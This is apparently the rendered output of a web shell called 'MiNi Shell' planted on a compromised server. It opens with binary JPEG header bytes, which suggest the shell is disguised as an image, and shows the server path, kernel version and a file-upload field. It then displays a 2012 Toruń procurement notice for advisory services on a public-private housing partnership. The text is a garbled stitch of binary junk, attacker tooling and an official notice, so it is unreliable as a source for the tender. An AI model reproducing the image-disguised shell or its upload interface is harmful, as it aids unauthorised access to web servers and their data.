JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120814/175283-N-2012.html

<p class="kh_header"><b>Toruń: Usługi doradcze dot. realizacji  przedsięwzięcia polegającego na budowie mieszkań komunalnych
w Toruniu w oparciu o model partnerstwa publiczno-prywatnego.</b><br>
<b>Numer ogłoszenia: 175283 - 2012; data zamieszczenia: 14.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Toruń reprezentowana przez Prezydenta Miasta Torunia , ul. Wały gen. Sikorskiego 8, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6118713, faks 056 6118622.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> um.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi doradcze dot. realizacji  przedsięwzięcia polegającego na budowie mieszkań komunalnych
w Toruniu w oparciu o model partnerstwa publiczno-prywatnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie kompleksowych usług doradczych, prawniczych, finansowo - ekonomicznych i technicznych obejmujących w szczególności: 
- udzielanie porad i konsultacji, umów, ogłoszeń, analiz i innych niezbędnych dokumentów, a także opinii prawnych, 
- uczestniczenie w spotkaniach organizowanych przez Gminę Miasta Toruń w postępowaniu dotyczącym wyboru partnera prywatnego lub koncesjonariusza do realizacji przedsięwzięcia inwestycyjnego polegającego na na budowie mieszkań komunalnych w Toruniu.
 
2. Świadczenie usług zostanie podzielone na trzy etapy i polegać będzie w szczególności na wykonaniu opracowań zawierających:
a) etap wstępny (czas trwania: nie dłużej niż 2 miesiące):
- analizie dokumentów strategicznych i finansowych Gminy Miasta Toruń pod kątem rozpoczęcia współpracy z inwestorami w ramach partnerstwa publiczno-prywatnego,
- przeprowadzeniu PPS (PPP Potential Scan - wstępna analiza PPP), w celu określenia korzyści zastosowania PPP,
- opracowaniu ogólnych koncepcji prawno-finansowych dla wskazanego projektu PPP,
- rekomendacji w zakresie działań związanych z wdrożeniem mechanizmu PPP lub koncesyjnego u Zamawiającego;

b) etap przygotowawczy (czas trwania: nie dłużej niż 5 miesięcy), w zależności od wyników analiz przeprowadzonych na etapie wstępnym będzie w szczególności polegał na:
- sporządzeniu rekomendowanej struktury prawno-finansowej,
- opracowaniu analizy finansowo-ekonomicznej,
- opracowaniu analizy ryzyka z uwzględnieniem podziału zadań pomiędzy podmiotem publicznym a partnerem prywatnym z uwzględnieniem skutków prawnych, 
- ocenie skutków podatkowych dla planowanego projektu,
- badanie wpływu projektu PPP na sytuację finansową jednostki pod kątem budżetu, długu publicznego oraz  wieloletniej prognozy finansowej,
- sporządzeniu analiz wystąpienia pomocy publicznej w projekcie PPP,
- wskazaniu zagadnień wymagających interpretacji z właściwymi instytucjami i organami (np. Ministerstwo Finansów, RIO, UZP),
- rekomendacji optymalnych sposobów i form realizacji przedsięwzięcia w ramach PPP lub koncesji,
- udziale w spotkaniach kierownictwa jednostek organizacyjnych JST  lub na sesji rady w celu prezentacji wyników przeprowadzonych analiz i udzielania wyjaśnień,
- badaniu rynku i opracowaniu listy potencjalnych wykonawców,
- promocji projektu PPP wśród potencjalnych wykonawców,
- organizacji spotkań informacyjnych z potencjalnymi wykonawcami,

c) etap wyboru inwestora prywatnego (czas trwania: nie dłużej niż 5 miesięcy):
- rekomendacja wyboru podstawy prawnej i trybu postępowania, wynikające z uprzednio sporządzonych analiz (weryfikacja),
- opracowanie regulaminu komisji przetargowej,
- opracowanie szczegółowego harmonogramu postępowania w celu wdrożenia PPP,
- opracowanie ogłoszenia o postępowaniu, zawierającego m.in. kryteria wyboru ofert do zamieszczenia w wymaganych publikatorach polskich i europejskich,
- opracowanie załączników do ogłoszenia, w zależności od wybranego trybu postępowania,
- ocena spełniania przez partnerów prywatnych i inne zainteresowane podmioty warunków udziału w postępowaniu,
- organizacja i udział w spotkaniach negocjacyjnych z potencjalnymi inwestorami prywatnymi w charakterze doradcy, biegłego lub członka komisji (aspekty prawne, finansowe, podatkowe, techniczne, organizacyjne, marketingowe, związane z zarządzaniem) - do czasu zakończenia negocjacji,
- udzielanie partnerom prywatnym i zainteresowanym podmiotom oraz podmiotowi publicznemu (koncesjodawcy) wszelkich informacji i wyjaśnień związanych z toczącym się postępowaniem,
- występowanie do potencjalnych wykonawców z dodatkowymi pytaniami lub w celu uzyskania dodatkowych wyjaśnień lub informacji,
- opracowanie Specyfikacji Istotnych Warunków Zamówienia (dalej: SIWZ) lub Opisu Warunków Koncesji (dalej: OWK),
- sporządzenie projektu umowy o PPP lub umowy koncesji,
- pomoc w udzielaniu wyjaśnień związanych z SIWZ, OWK lub warunkami umowy,
- sporządzenie zaproszeń do złożenia oferty przez potencjalnych inwestorów,
- pomoc w ocenie złożonych ofert pod kątem formalno-prawnym oraz merytorycznym,
- pomoc w wyborze najkorzystniejszej oferty, m.in. poprzez przeprowadzenie analizy PSC (Public Sector Comparator - komparator sektora publicznego) - porównanie wybranej oferty PPP z modelem tradycyjnym,
- sporządzenie ostatecznej wersji umowy o PPP, umowy koncesji na roboty budowlane lub umowy koncesji na usługi wraz ze wszelkimi niezbędnymi umowami wykonawczymi (pakiet kontraktowy PPP).
3. Podstawą przejścia do następnego etapu jest zatwierdzenie protokołu odbioru prac przez Zamawiającego, o którym mowa w § 7 ust. 5 wzoru umowy oraz pisemna decyzja Zamawiającego o przejściu do następnego etapu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5, 66.17.10.00-9, 72.22.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12000</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania wniosków, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie: a) co najmniej 2 zamówień, których przedmiotem było wykonanie analiz finansowo - ekonomicznych przedsięwzięcia lub studium wykonalności dla projektu o szacunkowej wartości robót co najmniej 5 mln zł brutto,
b) co najmniej 1 zamówienia, którego przedmiotem było wykonanie doradztwa prawnego w postępowaniu na wyłonienie partnera prywatnego lub koncesjonariusza dla przedsięwzięcia realizowanego w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi, którego przedmiotem było projektowanie, wybudowanie i eksploatowanie przez inwestora/ partnera prywatnego/ koncesjonariusza (w tym w trybie ustawy o partnerstwie publiczno - prywatnym, ustawy o koncesji na roboty budowlane i usługi), obiektów budowlanych, i dla których wartość nakładów inwestycyjnych wyniosła co najmniej 5 mln zł brutto,
c) co najmniej 1 zamówienia, którego przedmiotem było wykonanie doradztwa finansowo - ekonomicznego w postępowaniu na wyłonienie partnera prywatnego lub koncesjonariusza dla przedsięwzięcia realizowanego w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi, którego przedmiotem było projektowanie, wybudowanie i eksploatowanie przez inwestora/ partnera prywatnego/ koncesjonariusza (w tym w trybie ustawy o partnerstwie publiczno - prywatnym, ustawy o koncesji na roboty budowlane i usługi), obiektów infrastruktury technicznej lub społecznej, i dla którego wartość nakładów inwestycyjnych wyniosła co najmniej 5 mln zł brutto, 
d) co najmniej 1 zamówienia, którego przedmiotem było wykonanie doradztwa technicznego w postępowaniu na wyłonienie partnera prywatnego lub koncesjonariusza dla przedsięwzięcia realizowanego w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi, którego przedmiotem było projektowanie, wybudowanie i eksploatowanie przez inwestora/ partnera prywatnego/ koncesjonariusza (w tym w trybie ustawy o partnerstwie publiczno - prywatnym, ustawy o koncesji na roboty budowlane i usługi), obiektów infrastruktury technicznej lub społecznej, i dla którego wartość nakładów inwestycyjnych wyniosła co najmniej 5 mln zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje następującymi osobami tj.a) osobą z wyższym wykształceniem kierująca zespołem i nadzorująca realizację Zamówienia posiadającą doświadczenie zawodowe w zakresie kierowania usługami doradczymi dla przygotowania i prowadzenia co najmniej jednego postępowania na realizację inwestycji w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi. 
b) Zespołem składającym się z : 
- co najmniej 1 osoby wpisanej na listę Radców Prawnych, Adwokatów lub na jedną z list prawników zagranicznych, prowadzonych odpowiednio przez okręgowe rady adwokackie lub rady okręgowych izb radców prawnych oraz posiada doświadczenie w zakresie organizacyjno - prawnej obsługi przygotowania i prowadzenia co najmniej dwóch postępowań na wybór partnera prywatnego lub koncesjonariusza dla inwestycji realizowanej w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi, 
- co najmniej 1 osoby posiadającej wykształcenie wyższe z ekonomii lub finansów, posiadającej doświadczenie w wykonywaniu co najmniej dwóch analiz ekonomiczno - finansowych, lub dwóch studiów wykonalności dla inwestycji infrastrukturalnych,
-  co najmniej 1 osoby wpisanej na listę doradców podatkowych i posiadającej doświadczenie w zakresie co najmniej dwóch analiz podatkowych inwestycji realizowanych w formule partnerstwa publiczno - prywatnego lub koncesji na roboty budowlane lub usługi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - zobowiązanie powinno być podpisane przez osoby upoważnione do reprezentowania tych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - doświadczenie wykonawcy - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia umowy będą wprowadzone pisemnie w formie aneksów pod rygorem nieważności. 
2. Zamawiający dopuszcza dokonanie zmian Umowy na warunkach określonych poniżej:
1) jeżeli zmiana Umowy dotyczyć będzie zmiany terminu wykonania przedmiotu zamówienia z przyczyn niezależnych od obu stron, które w szczególności dotyczyć będą:
a) uwarunkowań organizacyjno-technicznych,
b) uwarunkowań formalno-prawnych, w tym zmiany obowiązującej stawki
podatku VAT.
2) jeżeli zmiana Umowy dotyczyć będzie konieczności wprowadzenia do zakresu przedmiotu Umowy ewentualnych opracowań dodatkowych lub zamiennych, których nie można było przewidzieć w chwili zawarcia umowy, z ewentualną korektą wynagrodzenia ustaloną na podstawie negocjacji stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Obsługi Inwestora - Toruń, ul. Grudziądzka 126 b pokój 117..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2012 godzina 11:00, miejsce: Biuro Obsługi Inwestora - Toruń, ul. Grudziądzka 126 b pokój 117..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com